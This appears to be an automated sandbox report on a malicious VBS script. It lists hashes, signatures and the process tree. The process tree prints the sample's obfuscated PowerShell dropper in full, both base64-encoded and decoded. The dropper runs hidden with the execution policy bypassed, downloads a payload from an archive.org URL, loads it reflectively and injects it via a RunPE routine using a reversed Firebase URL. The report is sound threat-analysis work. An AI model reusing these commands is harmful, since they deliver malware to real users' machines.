Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-09-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1.vbs
Resource
win10v2004-20240802-en
General
-
Target
e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1.vbs
-
Size
504KB
-
MD5
581a2142bc26026893bbdfab4e65f694
-
SHA1
e5b3a5977750cd34a69e908bf22893f153b9301f
-
SHA256
e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1
-
SHA512
5f74d6b90e9791f7c403690126fdd4f0bfcfde9dcd099d1ef0adb72d8f94b89ed1e9f708eaf2e853da1a681cbf3695e0421191f52902870dfbcedad5b9ff8808
-
SSDEEP
12288:u9M/PycpcyDgDy8f1xLWFIZni8itFw9UPpVaElOOywO5lowt4sG50v8eKjDo6c5l:S0ifJtH
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 2580 powershell.exe 4 2580 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2680 powershell.exe 2580 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2680 powershell.exe 2580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2796 wrote to memory of 2680 2796 WScript.exe powershell.exe PID 2796 wrote to memory of 2680 2796 WScript.exe powershell.exe PID 2796 wrote to memory of 2680 2796 WScript.exe powershell.exe PID 2680 wrote to memory of 2580 2680 powershell.exe powershell.exe PID 2680 wrote to memory of 2580 2680 powershell.exe powershell.exe PID 2680 wrote to memory of 2580 2680 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9JysndXJsID0nKycgeycrJzJ9aHQnKyd0JysncHM6JysnLycrJy8nKydpYTYwJysnMDEnKycwMC4nKyd1cy5hJysncicrJ2NoaXZlLicrJ29yZy8yNC8nKydpdGVtcy8nKydkZXRhaC1ub3RlLXYvRGV0YWhOb3QnKydlVi4nKyd0eHR7Mn0nKyc7eycrJzB9YmEnKydzZTY0QycrJ29udCcrJ2VuJysndCcrJyA9JysnIChOZScrJ3ctJysnTycrJ2InKydqZWN0JysnIFN5cycrJ3RlbS4nKydOZXQuV2ViQ2wnKydpJysnZW4nKyd0JysnKS4nKydEb3dubG8nKydhZFN0cicrJ2luZygnKyd7MH11JysncicrJ2wpJysnO3swfWJpJysnbmFyeUNvbnQnKydlJysnbnQgJysnPSAnKydbU3knKydzdCcrJ2UnKydtJysnLicrJ0NvbnZlcnQnKyddOicrJzpGcicrJ29tQmEnKydzZScrJzYnKyc0JysnU3QnKydyaW4nKydnKHswfScrJ2Jhc2U2JysnNENvJysnbnQnKydlbnQpJysnOycrJ3swfScrJ2EnKydzJysnc2VtJysnYmx5ID0gW1InKydlJysnZicrJ2xlYycrJ3RpJysnbycrJ24uJysnQScrJ3NzZW1ibHldOjpMb2FkKHswJysnfWJpbmFyeUNvbnRlbnQnKycpOycrJ3swJysnfXQnKyd5JysncGUgJysnPSB7MH1hcycrJ3NlJysnbWJseS5HJysnZScrJ3QnKydUeXBlKHsyJysnfVJ1blBFLicrJ0hvJysnbWV7Mn0nKycpJysnOycrJ3swfW1ldGhvJysnZCAnKyc9ICcrJ3swfXQnKyd5cGUuR2V0TScrJ2V0aCcrJ29kKHsyfVZBJysnSXsyfScrJyknKyc7eycrJzB9bWV0JysnaCcrJ29kLkludm9rZScrJyh7JysnMH1udWwnKydsLCAnKydbb2JqZWN0W10nKyddQCh7Mn0nKyc3NWViMjA5YzU0ZDYtY2E3JysnOCcrJy1hM2I0LTMnKyc1ZDctMDE3ZGJjJysnNWMnKyc9bmUnKydrJysnb3QmYScrJ2lkZScrJ209JysndCcrJ2wnKydhJysnP3QnKyd4dCcrJy5lJysnc2FiJysnL28nKycvbScrJ29jJysnLicrJ3RvcHNwJysncGEnKycuMycrJzJlMycrJzUnKycteXRpYy0nKydyZScrJ2J5Yy8nKydiJysnLycrJzB2L21vYy5zaXBhZWwnKydnb29nJysnLmVnJysnYScrJ3InKydvdHMnKydlJysnc2FiJysnZXJpJysnZicrJy8nKycvJysnOnMnKydwdHRoJysnezJ9ICwgJysnezJ9MXsyfScrJyAsJysnIHsyfUMnKyc6ezF9UCcrJ3InKydvZ3JhJysnbScrJ0QnKydhdCcrJ2F7MX17JysnMn0gLCcrJyB7JysnMicrJ31hcmFuZW9ncicrJ2FmaWF7JysnMn0sezJ9QWRkJysnSW5Qcm9jZScrJ3NzMzJ7Mn0nKycsezJ9eycrJzInKyd9KSknKSAgLUYgW0NIYXJdMzYsW0NIYXJdOTIsW0NIYXJdMzkpfCAmKCAkRW5WOmNvbXNQZWNbNCwyNCwyNV0tak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'url ='+' {'+'2}ht'+'t'+'ps:'+'/'+'/'+'ia60'+'01'+'00.'+'us.a'+'r'+'chive.'+'org/24/'+'items/'+'detah-note-v/DetahNot'+'eV.'+'txt{2}'+';{'+'0}ba'+'se64C'+'ont'+'en'+'t'+' ='+' (Ne'+'w-'+'O'+'b'+'ject'+' Sys'+'tem.'+'Net.WebCl'+'i'+'en'+'t'+').'+'Downlo'+'adStr'+'ing('+'{0}u'+'r'+'l)'+';{0}bi'+'naryCont'+'e'+'nt '+'= '+'[Sy'+'st'+'e'+'m'+'.'+'Convert'+']:'+':Fr'+'omBa'+'se'+'6'+'4'+'St'+'rin'+'g({0}'+'base6'+'4Co'+'nt'+'ent)'+';'+'{0}'+'a'+'s'+'sem'+'bly = [R'+'e'+'f'+'lec'+'ti'+'o'+'n.'+'A'+'ssembly]::Load({0'+'}binaryContent'+');'+'{0'+'}t'+'y'+'pe '+'= {0}as'+'se'+'mbly.G'+'e'+'t'+'Type({2'+'}RunPE.'+'Ho'+'me{2}'+')'+';'+'{0}metho'+'d '+'= '+'{0}t'+'ype.GetM'+'eth'+'od({2}VA'+'I{2}'+')'+';{'+'0}met'+'h'+'od.Invoke'+'({'+'0}nul'+'l, '+'[object[]'+']@({2}'+'75eb209c54d6-ca7'+'8'+'-a3b4-3'+'5d7-017dbc'+'5c'+'=ne'+'k'+'ot&a'+'ide'+'m='+'t'+'l'+'a'+'?t'+'xt'+'.e'+'sab'+'/o'+'/m'+'oc'+'.'+'topsp'+'pa'+'.3'+'2e3'+'5'+'-ytic-'+'re'+'byc/'+'b'+'/'+'0v/moc.sipael'+'goog'+'.eg'+'a'+'r'+'ots'+'e'+'sab'+'eri'+'f'+'/'+'/'+':s'+'ptth'+'{2} , '+'{2}1{2}'+' ,'+' {2}C'+':{1}P'+'r'+'ogra'+'m'+'D'+'at'+'a{1}{'+'2} ,'+' {'+'2'+'}araneogr'+'afia{'+'2},{2}Add'+'InProce'+'ss32{2}'+',{2}{'+'2'+'}))') -F [CHar]36,[CHar]92,[CHar]39)| &( $EnV:comsPec[4,24,25]-jOIn'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c4d4195354bdfd7ed85234842026829f
SHA12844f269912f04ccd5f63cd60b7ea9b605c75e63
SHA256b42bac761488cef0d80373af6c719a4303bcb0f62823929861e9cb53740e48dd
SHA51293029822eaaaa680b82ed907d939f1bbfa52b9625c6d2760695ec6b19821b56214796cca3ad04ec53e4f43c6c51e7ef65fdfb823e8af1333c5bdc7808acda97d